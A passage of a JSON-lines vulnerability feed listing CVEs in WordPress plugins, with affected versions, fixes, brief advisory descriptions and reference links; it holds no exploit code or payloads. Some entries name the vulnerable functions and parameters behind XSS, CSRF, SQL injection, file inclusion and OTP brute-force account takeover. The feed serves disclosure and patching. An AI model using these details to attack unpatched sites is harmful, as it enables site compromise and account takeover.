version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06e48355-6932-4401-8787-e6432444930f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06e48355-6932-4401-8787-e6432444930f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048838\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Shortcodes\\\/Recordings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048838\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Shortcodes\\\/Recordings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1011","slug":"chatbot","versionEndExcluding":"4.4.5","description":"The AI ChatBot WordPress plugin before 4.4.5 does not escape most of its settings before outputting them back in the dashboard, and does not have a proper CSRF check, allowing attackers to make a logged in admin set XSS payloads in them.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1784446-b3da-4175-9dac-20b030f19984\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1784446-b3da-4175-9dac-20b030f19984\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9305","slug":"apppresser","versionImpact":"4.4.4","versionEndExcluding":"4.4.5","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.4. This is due to the appp_reset_password() and validate_reset_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any users passwords, including an administrator.","recommendation":"Update to version 4.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45647fa6-a98d-4eb4-a287-f523e434688b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45647fa6-a98d-4eb4-a287-f523e434688b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_Ajax_Extras.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_Ajax_Extras.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_WPAPI_Mods.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_WPAPI_Mods.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168744%40apppresser&new=3168744%40apppresser&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168744%40apppresser&new=3168744%40apppresser&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4842","slug":"social-warfare","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social_warfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5b9aff-0833-4887-ae59-df5bc88c7f91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5b9aff-0833-4887-ae59-df5bc88c7f91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L877\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L877\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982662\\\/social-warfare#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982662\\\/social-warfare#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2088","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.3 via the 'nxs_getExpSettings' function. This makes it possible for authenticated attackers, with subscriber access and above, to extract sensitive data including social network API keys and secrets.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70724bc7-c1f4-4965-8bba-99b2ed21d34b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70724bc7-c1f4-4965-8bba-99b2ed21d34b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084635\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084635\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1762","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTTP_USER_AGENT header in all versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the victim to select view \"All Cron Events\" in order for the injection to fire.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8063a545-4792-4ab7-b188-0e51a0fcfed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8063a545-4792-4ab7-b188-0e51a0fcfed4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/NextScripts_SNAP.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/NextScripts_SNAP.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1446","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.3. This is due to missing or incorrect nonce validation on the nxssnap-reposter page. This makes it possible for unauthenticated attackers to delete arbitrary posts or pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306b23ee-7dcb-4281-a218-21168998c4b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306b23ee-7dcb-4281-a218-21168998c4b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084635%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&old=3004433%40social-networks-auto-poster-facebook-twitter-g%2Ftrunk&sfp_email=&sfph_mail=#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-38519","slug":"mainwp","versionImpact":"4.4.3.3","versionEndExcluding":"4.4.3.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard \u2013 WordPress Manager for Multiple Websites Maintenance.This issue affects MainWP Dashboard \u2013 WordPress Manager for Multiple Websites Maintenance: from n\/a through 4.4.3.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mainwp\\\/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/mainwp\\\/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6623","slug":"essential-blocks","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/633c28e0-0c9e-4e68-9424-55c32789b41f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/633c28e0-0c9e-4e68-9424-55c32789b41f\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1985","slug":"simple-membership","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/trunk\\\/views\\\/edit-v2.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0062","slug":"ean-for-woocommerce","versionEndExcluding":"4.4.3","description":"The EAN for WooCommerce WordPress plugin before 4.4.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/450f94a3-56b1-41c7-ac29-fbda1dc04794\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/450f94a3-56b1-41c7-ac29-fbda1dc04794\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5791","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp_id' parameter in all versions up to, and including, 4.4.2 due to missing authorization checks on processAction function, as well as insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a wp-admin dashboard.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c033171a-d81f-4cae-830b-8bdc4017b85e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c033171a-d81f-4cae-830b-8bdc4017b85e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/tags\\\/4.4.2\\\/vcita-api-functions.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/tags\\\/4.4.2\\\/vcita-api-functions.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5859","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018d\u2019 parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ea0559-dec7-4c20-956d-dbfe7bc67634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ea0559-dec7-4c20-956d-dbfe7bc67634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104980%40meeting-scheduler-by-vcita&new=3104980%40meeting-scheduler-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104980%40meeting-scheduler-by-vcita&new=3104980%40meeting-scheduler-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28172","slug":"wp-google-map-plugin","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in flippercode WordPress Plugin for Google Maps \u2013 WP MAPS (formerly WP Google Map Plugin) plugin <=\u00a04.4.2 versions.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wp-maps-plugin-4-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wp-maps-plugin-4-4-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37262","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita.Com Online Booking & Scheduling Calendar for WordPress by vcita allows Reflected XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.2.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37499","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.2","versionEndExcluding":"4.4.3","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Path Traversal.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.2.","recommendation":"Update to version 4.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-2-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-2-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9236","slug":"tlp-team","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The Team  WordPress plugin before 4.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd06ba56-37dd-4c23-ae7c-ab8de40d1645\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd06ba56-37dd-4c23-ae7c-ab8de40d1645\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1666","slug":"cookiebot","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The Cookie banner plugin for WordPress \u2013 Cookiebot CMP by Usercentrics plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the send_uninstall_survey() function in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit the uninstall survey on behalf of a website.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookiebot\\\/tags\\\/4.4.1\\\/src\\\/lib\\\/Cookiebot_Review.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookiebot\\\/tags\\\/4.4.1\\\/src\\\/lib\\\/Cookiebot_Review.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251089%40cookiebot&new=3251089%40cookiebot&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251089%40cookiebot&new=3251089%40cookiebot&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e5fca6-363c-4875-9eb8-44e080d99650?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e5fca6-363c-4875-9eb8-44e080d99650?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1092","slug":"feedzy-rss-feeds","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98053141-fe97-4bd4-b820-b6cca3426109?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98053141-fe97-4bd4-b820-b6cca3426109?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0957","slug":"print-invoices-packing-slip-labels-for-woocommerce","versionImpact":"4.4.1","versionEndExcluding":"4.4.2","description":"The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Customer Notes field in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected invoice for printing.","recommendation":"Update to version 4.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
